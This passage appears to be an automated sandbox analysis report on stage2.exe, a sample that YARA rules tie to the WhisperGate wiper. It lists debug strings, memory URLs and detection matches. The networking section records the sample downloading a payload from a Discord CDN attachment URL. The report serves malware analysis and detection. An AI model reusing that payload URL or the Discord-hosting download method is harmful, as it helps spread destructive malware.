    Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: secur32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Core.ni.pdbRSDSD source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: (P}k0C:\Windows\mscorlib.pdb source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: shcore.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbW source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.ni.pdbT3Mn source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: stage2.exe, 00000001.00000000.438573305.0000000001686000.00000004.00000020.sdmp
    Source: Binary string: .pdb! source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: shell32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: winhttp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb6 source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: System.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: rtutils.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: fwpuclnt.pdb& id7 source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: profapi.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: sechost.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: mscorlib.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: System.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: clrjit.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: bcrypt.pdbF source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: rasman.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: propsys.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: wUxTheme.pdb4Shd source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: rasadhlp.pdbh source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: winhttp.pdb\ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: version.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: Windows.StateRepositoryPS.pdb+3 source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: System.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: System.Xml.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: psapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: gpapi.pdb2 ]dd source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: cldapi.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001A.00000003.447382616.0000000000D85000.00000004.00000001.sdmp
    Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: dhcpcsvc.pdbn source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: wuser32.pdb>Srdn source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: combase.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: rsaenh.pdb@ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: arkjrukCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000001A.00000002.477704320.00000000006E2000.00000004.00000001.sdmp
    Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: System.ni.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: edputil.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: winnsi.pdb< gd> source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp

    Networking:

    Yara detected MSILDownloaderGeneric
    Source: Yara matchFile source: Process Memory Space: stage2.exe PID: 7084, type: MEMORYSTR
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: global trafficHTTP traffic detected: GET /attachments/928503440139771947/930108637681184768/Tbopbh.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
    Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 17 Jan 2022 01:25:24 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 223Connection: closeCF-Ray: 6cebca1adc534a68-FRACache-Control: private, max-age=0Expires: Mon, 17 Jan 2022 01:25:24 GMTVary: Accept-EncodingCF-Cache-Status: MISSAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"X-GUploader-UploadID: ADPycds5oM3NpZ9AylXZpGVOB9ntKzX9oHiZ36JltKQWVbDwXaSj4icPcReICi5s5vNaRHT4QvI_mIj3uwpfm47zzoOikFzaRAX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RfbSACd0FpP8AarT40rUdyTU16oiVuL8ktNluhrU0TLjW%2BTGsBj6c0zZg%2FW2Tg%2BHLybyYjE0%2BAX8GvswXYherK%2BwZycY1622%2BqIiXLXq84wLdlCovP450WnSVpVht58ekJr99w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
    Source: stage2.exe, 00000001.00000000.438989759.000000000337A000.00000004.00000001.sdmpString found in binary or memory: http://cdn.discordapp.com
    Source: stage2.exe, 00000001.00000000.438573305.0000000001686000.00000004.00000020.sdmp, powershell.exe, 00000002.00000002.339502555.0000000000FB3000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.426449347.0000000000DCD000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.475719266.0000000004B86000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479105876.0000000004B86000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 0000000D.00000002.432860821.0000000009220000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoft
    Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png$
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
    Source: stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.340839036.0000000004DC1000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.427485435.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
    Source: Amcache.hve.26.drString found in binary or memory: http://upx.sf.net
    Source: powershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html$
    Source: stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com
    Source: stage2.exeString found in binary or memory: https://cdn.discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg
    Source: stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com4
    Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester$
    Source: powershell.exe, 00000002.00000002.341684839.0000000005150000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.429277847.0000000004FA7000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
    Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: WerFault.exe, 0000001A.00000002.478119853.0000000000DAA000.00000004.00000001.sdmpString found in binary or memory: https://watson.telemetry)
    Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
    Source: global trafficHTTP traffic detected: GET /attachments/928503440139771947/930108637681184768/Tbopbh.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
    Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49752 version: TLS 1.2

    System Summary:

    Source: stage2.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
    Source: stage2.exe, type: SAMPLEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: stage2.exe, type: SAMPLEMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: stage2.exe, type: SAMPLEMatched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.2.stage2.exe.ea0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 1.2.stage2.exe.ea0000.0.unpack, type: UNPACKEDPEMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.2.stage2.exe.ea0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Unknown_Discord_Characteristics_Jan22_1 date = 2022-01-16, author = Florian Roth, description = Detects unknown malware with a few indicators also found in Wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
    Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 1.0.stage2.exe.ea0000.0.unpack, type: UNPACKEDPEMatched rule: APT_HKTL_Wiper_WhisperGate_Jan22_2 date = 2022-01-16, author = Florian Roth, description = Detects unknown wiper malware, reference = https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, score = dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
